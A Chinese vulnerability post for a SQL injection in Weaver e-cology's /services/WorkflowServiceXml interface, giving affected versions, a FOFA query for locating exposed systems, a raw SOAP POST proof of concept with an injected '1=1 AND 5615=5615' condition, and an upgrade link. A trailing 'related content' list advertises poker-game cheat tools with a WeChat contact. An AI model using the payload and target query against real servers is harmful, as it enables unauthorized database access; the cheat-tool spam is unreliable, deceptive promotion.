泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)
创始人
2025-01-08 04:32:28
0

漏洞描述:
泛微 e-cology 是泛微公司开发的协同管理应用平台。泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。

漏洞发现时间:

2024-7-12


影响版本:
e-cology9 < 10.64.1

FOFA语法:

app="泛微-OA(e-cology)"

POC:

POST /services/WorkflowServiceXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: text/xml Accept-Encoding: gzip Content-Length: 487                      1         1         1         1                      1=1 AND 5615=5615                    

漏洞复现:


修复:

目前官方已有可更新版本,建议受影响用户升级至最新版本:

https://www.weaver.com.cn/cs/securityDownload.html

参考文献:

OSCS | 开源软件供应链安全社区 | 让每一个开源项目变得更安全

POC/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md at main · wy876/POC · GitHub

相关内容

热门资讯

第5分钟了解!we-poker... 第5分钟了解!we-poker辅助软件演示,钱塘十三水有吗,安装教程(证实有挂)-哔哩哔哩1、操作简...
黑科技中牌率(德州手机)外挂透... 您好,德州手机这款游戏可以开挂的,确实是有挂的,需要了解加去威信【136704302】很多玩家在这款...
黑科技透明挂(红龙软件德州扑克... 黑科技透明挂(红龙软件德州扑克)外挂透明挂黑科技辅助器(透视)微扑克教程(2026已更新)(哔哩哔哩...
黑科技系统!Wpk有挂吗,太夸... 黑科技系统!Wpk有挂吗,太夸张了本来真的是有挂(透视)曝光教程(2020已更新)(哔哩哔哩);1)...
黑科技黑科技(德扑之星决策)外... 黑科技黑科技(德扑之星决策)外挂透明挂辅助黑科技(透视)wpk教程(2020已更新)(哔哩哔哩)1、...
第四分钟了解!we-poker... 第四分钟了解!we-poker有挂吗,欢乐卡五星微信小程序辅助器,系统教程(有挂技巧)-哔哩哔哩1)...
黑科技俱乐部(WPK)外挂透明... 黑科技俱乐部(WPK)外挂透明挂黑科技辅助插件(透视)解说技巧(2023已更新)(哔哩哔哩)1、WP...
黑科技科技!智星德州菠萝辅助器... 您好,智星德州菠萝辅助器免费下载这款游戏可以开挂的,确实是有挂的,需要了解加去威信【13670430...
黑科技规律(约局吧)外挂透明挂... 黑科技规律(约局吧)外挂透明挂辅助黑科技(透视)安装教程(2026已更新)(哔哩哔哩);小薇(透视辅...
第五分钟了解!微扑克ai辅助,... 第五分钟了解!微扑克ai辅助,中至510k拿奖攻略,详细教程(确实有挂)-哔哩哔哩中至510k拿奖攻...